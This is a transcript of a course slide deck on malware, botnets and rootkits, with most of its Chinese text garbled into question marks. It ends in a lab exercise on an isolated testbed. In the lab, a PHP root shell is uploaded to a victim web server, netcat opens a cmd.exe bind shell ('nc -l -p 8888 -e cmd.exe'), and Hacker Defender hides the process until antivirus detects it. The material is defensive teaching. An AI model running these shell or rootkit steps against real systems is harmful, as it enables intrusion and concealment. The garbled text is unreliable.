Module 11: ????????????? - PowerPoint PPT Presentation

1 / 105
About This Presentation
Title:

Module 11: ?????????????

Description:

Module 11 * * * * * * * * * ... – PowerPoint PPT presentation

Number of Views:116
Avg rating:3.0/5.0
Slides: 106
Provided by: boak
Category:

less

Transcript and Presenter's Notes

Title: Module 11: ?????????????


1
Module 11 ?????????????
2
????
  • ??????????????Botnet????????,?????????????????????
    ??????????????????????,??????????????
  • 2. ?????????????
  • (1)??????()
  • (2)???????????()
  • (3)???? - Botnet()
  • (4)???? - Rootkits()
  • (5)Rootkit????????()
  • (6)?????????()
  • ??????

3
Module 11?????????????
  • Module 11-1??????()
  • Module 11-2???????????()
  • Module 11-3???? - Botnet()
  • Module 11-4???? - Rootkits()
  • Module 11-5Rootkit????????()
  • Module 11-6?????????()

??(basic)??????? ??(moderate)???????????,???
??????? ??(advanced)??????????
4
  • Module 11-1??????()

5
??
  • ??????????????????????????(script),???????????????
    ?????????,???????????????????
  • ????????????????????,??????????,????????Port??????
    ,???????????????????
  • ????????????

6
??
  • ????????????,????????????????????

7
??????
  • ????????????????????????????????
  • ????????????,????????
  • ??(Virus)
  • ??(Worm)
  • ?????(Trojan horse)
  • Rootkits
  • ???????????,????????????????,?????????????????????
    ???????

8
?????? - ??(Virus)
  • ?????????,????????????,????
  • ?????????,???????????
  • ?????????????????
  • ????????????????,????????,???CMOS?Flash BIOS?????

9
?????? - ??(Worm)
  • ??????,????????????
  • ????????????,??????,?????????
  • ??????????
  • ??????,?????
  • ??????????????????
  • ???????????????????

10
?????? - ?????(Trojan horse)
  • ?????????????????,???????????????????,??????????
  • ??????????,?????????????????????
  • ?????????
  • Universal????????
  • Transitive????????,???????

11
??????
???? ??
XF Excel????
W32 32???,????32?Windows??
WINT 32?Windows??,???Windows NT
Troj ?????
VBS VBScript?????????
VSM ?? Visio VBA???script????script??
JS JScript?????????
  • ????????1991?,?CARO(Computer Antivirus
    Researchers Organization)???????????,???????????
  • lt??????gt//lt??gt/ltfamily??gt.ltgroup??gt.ltinfective_??
    gt.lt??gt.lt?????gt

Example virus//w32/Beast.41472.A
????The Art of Computer Virus Research and
Defense
12
??????????
2008 FBI/CSI Survey ????http//i.cmpnet.com/v2.g
ocsi.com/pdf/CSIsurvey2008.pdf
13
?????????? (?)
2007???????
14
??????????
  • ???????????,??????
  • ?????????
  • ???????????????
  • ????????,????????????
  • ????????,??????????????
  • ???????????????,????????????

15
?????????
  • ?????????????,??????????????(?????????????),??????
    ???
  • ???????????????
  • ????
  • ???????
  • ????
  • ?????????????????
  • ?????
  • ???????

16
  • Module 11-2???????????()

17
????????
  • ????????????,??????????,????????
  • ????
  • ??????
  • IM (Internet Message)??
  • Email
  • P2P????
  • ?????

18
???????????
  • ??????
  • ????????????????????
  • ??RegisterServiceProcess??????????
  • DLL injection
  • ?????
  • ?????????????????????
  • ???????????????????
  • ???????????
  • ?????

19
??????
  • DLL Injection??????????,?????????????
  • ????????????DLL??????
  • ??SetWindowsHookEx??,????DLL??????????,???????????
    ?DLL??
  • API Hooking
  • API?Windows??????,????????DLL Injection???????????
    ???API

20
?????(Packer)
  • ?????????????????,????????????,???????????????????
    ????
  • ?????????????????????????,???????????,????????????
    ???????
  • ?????????????????

21
???????????
  • ????????????????
  • ???????????
  • ?????????
  • ????????????????????????,?????????????????????????
    ???
  • ???????(Anti-VM or Anti-Emulator)

22
????????(Polymorphism)
  • ??????????????????,??????????????,?????????
  • ?

?????
MOV AX, 0E88 set key 1 MOV di,
AX MOV BX, BP0D2B pick next word
?????
MOV AX, 0E88 set key 1 INC SI
?? MOV di, AX CLC
?? NOP
?? MOV BX, BP0D2B pick
next word
23
?????????
  • ???????????????
  • ??????
  • ????
  • ????
  • ??????
  • ?????(checksum)
  • ???????

24
?????? - ????
  • ????????????????,????????????,????????????
  • ?????
  • ????????????
  • ???????IDA pro?Ollydebug
  • ????
  • ???????????,???????,????????????
  • ??????PEID
  • ????????????????????

25
?????? - ????
  • ????????,????,??????????????????????,?????????????
    ??
  • ????????,????????????,??????????????????
  • ?????????????????????
  • ??????????,?????????
  • CWSandbox?????????
  • (http//www.cwsandbox.org/)

26
??????
  • ????????????
  • ????
  • ??????????
  • ?????
  • ????
  • ??????????

27
  • Module 11-3???? - Botnet()

28
??????
  • Botrobot???,?????????????,??????????????,????????
    ???
  • Zombie(????)???Bot???,?????????
  • Botnet????Bot????????,????????????

29
Botnet????
  • ???????Botnet?????????????Botnet,?????
  • ?????????,Botnet????????????,????????????????????

30
Botnet??
  • ?IRC Botnet??
  • ???IRC Botnet????IRC Server???????,?????IRC
    Server?????????????
  • ???????IRC Server???,?????????
  • ?????????????????,????????????,?????????????,????
    ????????
  • ???????????????????DoS??
  • ?????????,??????

31
Botnet??????????
??/?? ??? ??? ??? ????
Bot ???? ???? ? ?????????
Trojan horse ? ?? ? ?????????
Worm ???? ?/? ?/? ???????
Spyware ? ? ???? ????
Virus ???? ? ? ????
???? http//zh.wikipedia.org/w/index.php?titleE
6AEADE5B18DE7B6B2E7B5A1variantzh-tw
32
Botnet?????
  • ??????,????????????
  • ????????????????????,??????????????????,?????????(
    2011-04-20)

????http//www.symantec.com/business/threatreport
/index.jsp
33
Botnet?????
  • Botnet???????????????????
  • ??
  • ??
  • ??

34
Botnet????
Bot????
35
Botnet????
  • ???????????????????Bot???,??????????????Botnet???
  • ?IRC Botnet??,?????????????(Bot),???????????????(C
    C/IRC Server)?????,?????????????

36
Botnet????
Bot????
37
Botnet???
  • Botnet???
  • Gartner?2008???75??????Bot
  • ????????????????????Bot
  • FBIBotnet?????????
  • ?10?????1.1???????????
  • ???????,????????,??????????????????????????????,??
    Bot????????????

????( botnet)??????? ????http//tw.trendmicro.co
m/tw/support/tech-support/board/tech/article/20081
007100643.html
38
Botnet??? (?)
  • ??Botnet??????,??????????
  • ??????
  • ???????,?????????????????????,????????????????????
    ??(DDoS)
  • ??????
  • Botnet??????????????,????????????????????IP??,????
    ???????

39
Botnet??? (?)
  • ????
  • ????????????????????????????
  • Bot???????(Sniffer)???????,???????????
  • ????
  • ????????,????????????,??????????????????????
  • ?????????????,?????????????

Mentors Research InterestBotnet?? ????http//
mentorwang.blogspot.com/2008/07/botnet.html
40
  • Module 11-4???? - Rootkits()

41
Rootkits??
  • Rootkits?Root?kits?????
  • Root ? Unix????????,??Unix????????
  • kits ?????????????
  • Rootkits
  • ???????????????????
  • ???????,??????????

42
Rootkits??
  • Rootkits?????????????????????????
  • Rootkits ??
  • User mode (ring 3)
  • Kernel mode (ring 0)
  • ???? (ring -1)
  • SMM mode (ring -2)

43
User Mode Rootkits
  • ??
  • IAT Hook
  • Inline function patch
  • ?? - easy for everything
  • ???????
  • ????

44
Kernel Mode Rootkits
  • ??
  • SSDT hook
  • IDT hook
  • Layered driver
  • Inline function patch
  • ?? - hard for everything
  • ???????,???????????
  • ???????Rootkits???

45
????Rootkits
  • Virtual Machine Based Rootkits
  • Samuel T. King Peter M. Chen?2006???
  • ??????????

RING 03
RING -1
RING -2
Host Hardware
46
SMM mode????()
  • ????CPU SMM mode??Rootkits
  • ?Rutkowska Joanna??????2009???
  • ?????????????,??????????????
  • ?????????Rootkits????

47
SMM mode Rootkits()
RAM
  • SMM mode - System Management Mode
  • ???CPU??????
  • ??????
  • ?????????????
  • ?????????
  • SMM mode???????????
  • ??????????
  • SMM mode???????????????
  • ?Rootkits??????????????????????,???????

Common
SMRAM
Common
Common
Common
48
???? - Sony??????????Rootkits??
  • ??
  • ??????????,??Sony????Rootkit??,?MicroVault
    USB?????????Windows???????,??????????????F-Secure?
    ???????,??????Sony?MicroVault USB?,????????????,??
    ??????,?????????????,?????????????????,?????????,?
    ??????????????,??????????,???????????

????http//www.ithome.com.tw/itadm/article.php?c
45063
49
??
  • ?????????????,?????????????????,????????????????
  • ?????????????????????,?????????????????????????
  • ??????????,???????????????

50
  • Module 11-5Rootkit????????()

51
Rootkit???????(?Root Shell??)
52
??????
  • ?Testbed?????,??????????

Victim (HTTP Server ) OSWindows XP
SP2 IP10.1.1.3
Attacker OSWindows XP SP2 IP10.1.1.2
53
????on Testbed_at_TWISC - ?????????
54
??
  • ??Victim??????????,??????
  • NetCat (nc.exe)??telnet????Shell??????????????
  • Root Shell???????,?NetCat????????? Root
    Sell??????
  • Hacker Defender???????Rootkit??,?????????????????
    (Hacker Defender 1.0.0)
  • ?Victim??????,??????
  • Avira AntiVir
  • ??????Avira????????????

55
??????? - NetCat
  • ??
  • NetCat 111 (nc.exe)
  • ??????
  • Microsoft Windows
  • ????
  • http//www.megaupload.com/?dPQCHRLCX
  • ??????
  • Attacker??

56
??????? - NetCat (?)
57
??????? - Rootshell
  • ??
  • Rootshell.v.2.0.php
  • ??????
  • Microsoft Windows
  • ????
  • http//www.megaupload.com/?dTANMWUVH
  • ??????
  • Victim??

58
??????? - Rootshell (?)
  • Rootshell

59
??????? - Hacker Defender
  • ??
  • Hacker Defender 1.0.0
  • ??????
  • Microsoft Windows
  • ????
  • http//www.megaupload.com/?dUV8WRCHJ
  • ??????
  • Attacker??

60
??????? - Hacker Defender (?)
  • Hacker Defender (defender v1.0.0???????)

?????? ???? ??
hxdef100.exe 70 144 b Hacker defender v1.0.0???
hxdef100.ini 3 872 b ini????
hxdef100.2.ini 3 695 b ini????,?2?
bdcli100.exe 26 624 b ?????
rdrbs100.exe 49 152 b redirectors base
readmecz.txt 34 654 b ????????
readmeen.txt 35 956 b ??????
readmefr.txt 38 029 b ??????
src.zip 91 936 b ???
readmezh.txt 38 029 b ??????
61
??????? - Hacker Defender (?)
  • Hacker Defender(????????)

???? ??
Hidden Table ???????
Root Processes ????
Hidden Services ????
Hidden RegKeys ??RegKeys??
Hidden RegValues ??RegValues
Startup Run ????????
Free Space ??????
Hidden Ports ??port
Settings hxdef???
62
??Rootkit?? - Avira AntiVir
  • ??
  • Avira AntiVir Personal - FREE Antivirus
  • ??????
  • Microsoft Windows
  • ????
  • http//www.free-av.com/de/trialpay_download/1/avir
    a_antivir_personal__free_antivirus.html
  • ??????
  • Victim??

63
??Rootkit?? - Avira AntiVir (?)
  • ??Avira ???????,??Rootkit???,??????????

64
????
  • ????
  • Victim?????HTTP Server
  • Victim?????Rootshell (Rootshell.v.2.0.php)
  • Attacker???Victim????
  • Attacker?????
  • ??Rootshell??,???nc.exe?Victim??
  • ???????
  • ??????????
  • Victim?????
  • ??????????

65
???? (?)
  • ???????????????,?Victim???????????????
  • ??????
  • ????
  • ??Rootshell???NetCat
  • ????
  • ????
  • Victim?????

66
????
  • ?????????????Victim??,??????,?????
  • ????????????????,?????????Victim????

67
???? (?)
  • ?Victim?????Appserv,???HTTP Server
  • Appserv????
  • http//prdownloads.sourceforge.net/appserv/appserv
    -win32-2.5.10.exe?download

68
???? (?)
69
???? (?)
70
???? (?)
  • ?????
  • ?Rootshell????Appserv?www???

71
??Root Shell???NetCat
  • ?Victim?????IP??

72
??Root Shell???NetCat (?)
  • ?Attacker???????,??Victim???IP?Rootshell????,?????
    ?

73
??Root Shell???NetCat (?)
  • Attacker????Rootshell?nc.exe???Victim??

74
??Root Shell???NetCat (?)
  • ?Victim???C\\Appserv\www\??nc.exe??????

75
????
  • ?Attacker????? Root Shell??nc -l -p 8888 e
    cmd.exe,?Victim??????
  • ?Execute?,?????????,???????,????????

76
???? (?)
  • ?Victim?????Process Explorer??,??Victim????Attacke
    r??????
  • Process Explorer????
  • http//technet.microsoft.com/en-us/sysinternals/bb
    896653.aspx
  • ???????nc.exe????,??????????????????
  • ??,?????????nc.exe??,????????

77
???? (?)
78
???? (?)
  • ?nc.exe????,??????

79
???? (?)
  • ????????,?Attacker??????????
  • ????????????,?????????nc.exe??,????????

80
???? (?)
  • ????????,?Attacker??????????
  • ??rm phpinfo.php???phpinfo.php,??Victim????

11-80
81
????
  • ?Attacker?????Hacker Defender??hxdef100.ini,?Hidd
    en Processes??????
  • \ltHiltgtdden" P/rgtoc"/eltssgtes\\gtn"c.ex"erclt
    md\.exlte

82
???? (?)
  • ??????????,??Victim???IP?Rootshell????
  • Attacker???Root Shell???????

83
???? (?)
  • Attacker???Rootshell???hxdef100.exe
  • ?Victim???nc.exe??????
  • ???Victim??,Process Explorer?????????nc.exe

84
???? (?)
85
???? (?)
  • ????????????,????????

11-85
86
Victim?????
  • Victim????Avira AntiVir????,??????Rootkit????????,
    ?????????
  • ??Avira AntiVir???????

87
Victim?????
  • ????????

11-87
88
Victim?????
  • ????

11-88
89
Victim?????
  • ??????

11-89
90
??
  • ?Rootkit????,???????
  • ?????Rootkit
  • ???????
  • ????
  • ?Rootkit????,???AntiRootkit????
  • ??Avira AntiRootkit??????
  • ???files?registry?processes?driver????
  • ???????????????,????????????????Rootkit

91
? ?
92
???
  • ???Botnet?????

93
???
  • ??????????Botnet???(???Botnet???),???????????????
    ??

94
???
  • ?????,???????Rootkit???????,?????

95
???
  • ??,????????????????Rootkit

96
Module 11-6 ?????????()
97
??????
  • ??????????????Rootkit????

98
??????
  • A????????????,????Root Shell??,?????????????NetCat
    ??????,??????????,???????,???????
  • ???????,??????
  • ??????Root Shell?NetCat???????
  • ??Hacker Defender????

99
?????? (?)
  • ????B????,????????????Rootkit,????????????,???????
    ?
  • ???????,??????
  • ??Avira Antivir????
  • ??Avira Antivir????

100
?????
Victim OSWindows XP SP2 IP10.0.1.2 ????AppServ
Attacker OSWindows XP SP2 IP10.0.1.1
AppServ??? http//www.appservnetwork.com
101
??????
  • ?????????,???????????
  • ?? 2011.06.01 2359 ?????? evannolimit_at_gmail.com
  • ????????????????

7-101
102
????
  • ????????????http//www.libertytimes.com.tw/2008/ne
    w/apr/30/today-life7.htm
  • ???????????http//www.cib.gov.tw/news/news02_2.asp
    x?no261
  • CNN???????!??????????http//www.nownews.com/2008/0
    8/07/339-2316527.htm
  • ????????????http//www.media.edu.cn/wang_luo_an_qu
    an_5177/20060630/t20060630_186389.shtml
  • ????-????http//zh.wikipedia.org/w/index.php?title
    E6AEADE5B18DE7B6B2E7B5A1variantzh-t
    w
  • Mentors Research InterestBotnet??http//mentor
    wang.blogspot.com/2008/07/Botnet.html

103
???? (?)
  • Spam Statistics from TRACEMarshal
  • http//www.marshal.com/TRACE/spam_statistics.asp
  • ??????Backdoor.Rustock.A??
  • http//ccnet.tnua.edu.tw/cert-news/viewtopic.php?
    p19sidc3133b653ed47a4918045a4b434bc9c0
  • the new pof 2.0.8 (2006-09-06)
  • http//lcamtuf.coredump.cx/p0f.shtml
  • rpmfind.net
  • http//rpmfind.net/linux/RPM/index.html
  • Conficker?????W32.Waledac??????
  • http//rogerspeaking.com/2009/04/2024

104
???? (?)
  • Kaspersky, ????????Rootkit, 2006/10/05 1850
  • VirusList ???????, Viruslist.com, 2005
  • iDEF2003 Anton Chuvakin, An Overview of Unix
    Rootkits
  • TWCERT/CC
  • www.cert.org.tw/document/
  • Greg Hoglund James Buther, Rootkits
    Subverting the Windows Kernel, Addison Wesley,
    2006
  • Nancy Altholz and Larry Stevenson, Rootkits for
    Dummies, Dummies, 2007
  • Wikipedia Encyclopedia
  • http//en.wikipedia.org/wiki/Rootkit

105
???? (?)
  • Chkrootkit
  • www.chkrootkit.org
  • Rootkit Hunter
  • http//www.rootkit.nl/
  • http//www.microsoft.com/taiwan/technet/columns/pr
    ofwin/19-Rootkits.mspx
  • http//www.ithome.com.tw/itadm/article.php?c45063
Write a Comment
User Comments (0)
About PowerShow.com